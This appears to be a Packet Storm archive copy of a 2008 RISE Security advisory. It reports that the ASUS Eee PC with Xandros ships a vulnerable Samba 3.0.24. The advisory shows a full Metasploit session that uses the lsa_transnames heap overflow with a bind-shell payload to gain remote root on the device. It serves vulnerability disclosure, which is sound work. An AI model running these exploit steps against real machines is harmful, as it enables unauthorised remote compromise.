exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

asus-samba.txt

asus-samba.txt
Posted Feb 8, 2008
Site risesecurity.org

The ASUS Eee PC as shipped with Xandros comes with a vulnerable version of Samba installed that allows for remote compromise.

tags | advisory, remote
SHA-256 | 71bf7631053c3310c81d2781e3ebef3601c5cfd618b1a704d74681b7bb71fecd

asus-samba.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We recently acquired an ASUS Eee PC (if you want to know more about it,
a lot of reviews are available on internet). The first thing we did when
we put our hands at the ASUS Eee PC was to test its security. The ASUS
Eee PC comes with a customized version of Xandros operating system
installed, and some other bundled software like Mozilla Firefox, Pidgin,
Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that
caught our attention was the running smbd process (the sshd daemon was
started by us, and is not enabled by default).


eeepc-rise:/root> ps -e
PID TTY TIME CMD
1 ? 00:00:00 fastinit
2 ? 00:00:00 ksoftirqd/0
3 ? 00:00:00 events/0
4 ? 00:00:00 khelper
5 ? 00:00:00 kthread
25 ? 00:00:00 kblockd/0
26 ? 00:00:00 kacpid
128 ? 00:00:00 ata/0
129 ? 00:00:00 ata_aux
130 ? 00:00:00 kseriod
148 ? 00:00:00 pdflush
149 ? 00:00:00 pdflush
150 ? 00:00:00 kswapd0
151 ? 00:00:00 aio/0
152 ? 00:00:00 unionfs_siod/0
778 ? 00:00:00 scsi_eh_0
779 ? 00:00:00 scsi_eh_1
799 ? 00:00:00 kpsmoused
819 ? 00:00:00 kjournald
855 ? 00:00:00 fastinit
857 ? 00:00:00 sh
858 ? 00:00:00 su
859 tty3 00:00:00 getty
862 ? 00:00:00 startx
880 ? 00:00:00 xinit
881 tty2 00:00:06 Xorg
890 ? 00:00:00 udevd
952 ? 00:00:00 ksuspend_usbd
953 ? 00:00:00 khubd
1002 ? 00:00:00 acpid
1027 ? 00:00:00 pciehpd_event
1055 ? 00:00:00 ifplugd
1101 ? 00:00:00 scsi_eh_2
1102 ? 00:00:00 usb-storage
1151 ? 00:00:00 icewm
1185 ? 00:00:01 AsusLauncher
1186 ? 00:00:00 icewmtray
1188 ? 00:00:01 powermonitor
1190 ? 00:00:00 minimixer
1191 ? 00:00:00 networkmonitor
1192 ? 00:00:00 wapmonitor
1193 ? 00:00:00 x-session-manag
1195 ? 00:00:00 x-session-manag
1200 ? 00:00:00 x-session-manag
1201 ? 00:00:00 dispwatch
1217 ? 00:00:00 cupsd
1224 ? 00:00:00 usbstorageapple
1234 ? 00:00:00 kondemand/0
1240 ? 00:00:00 portmap
1248 ? 00:00:00 keyboardstatus
1272 ? 00:00:00 memd
1279 ? 00:00:00 scim-helper-man
1280 ? 00:00:00 scim-panel-gtk
1282 ? 00:00:00 scim-launcher
1297 ? 00:00:00 netserv
1331 ? 00:00:00 asusosd
1476 ? 00:00:00 xandrosncs-agen
1775 ? 00:00:00 dhclient3
2002 ? 00:00:00 nmbd
2004 ? 00:00:00 smbd
2005 ? 00:00:00 smbd
2322 ? 00:00:00 sshd
2345 ? 00:00:00 sshd
2356 pts/0 00:00:00 bash
2362 pts/0 00:00:00 ps
eeepc-rise:/root>


Retrieving the the smbd version, we discovered that it runs a vulnerable
version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
we published earlier last year.


eeepc-rise:/root> smbd --version
Version 3.0.24
eeepc-rise:/root>


With this information, we ran our exploit against the ASUS Eee PC using
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
Debian based).


msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
RHOST => 192.168.50.10
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

Id Name
-- ----
0 Linux vsyscall
1 Linux Heap Brute Force (Debian/Ubuntu)
2 Linux Heap Brute Force (Gentoo)
3 Linux Heap Brute Force (Mandriva)
4 Linux Heap Brute Force (RHEL/CentOS)
5 Linux Heap Brute Force (SUSE)
6 Linux Heap Brute Force (Slackware)
7 DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
GNU/Linux
id
uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)


Easy to learn, Easy to work, Easy to root.


The original blog post and more information can be found in our
website at http://risesecurity.org/.

Best regards,
RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHrIdmhFjK78TGSUERAnQRAKC+y18h92I4cTnjmDJkTKfdtbno2ACgkdqs
v7aF1eU5H9uSfL4zU5AWCB4=
=pDq2
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close